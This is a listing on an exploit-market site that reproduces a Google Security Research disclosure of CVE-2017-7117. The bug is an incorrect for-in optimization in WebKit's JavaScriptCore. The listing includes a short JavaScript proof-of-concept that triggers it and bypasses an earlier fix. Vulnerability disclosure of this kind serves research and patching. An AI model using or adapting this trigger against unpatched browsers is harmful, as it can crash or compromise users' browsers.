[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebKit JSC Incorrect Optimization Vulnerability

Author
Google Security Research
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-28740
Category
dos / poc
Date add
04-10-2017
Platform
multiple
WebKit: JSC: Incorrect for-in optimization #2

CVE-2017-7117


The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal

PoC:
function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

#  0day.today [2024-12-25]  #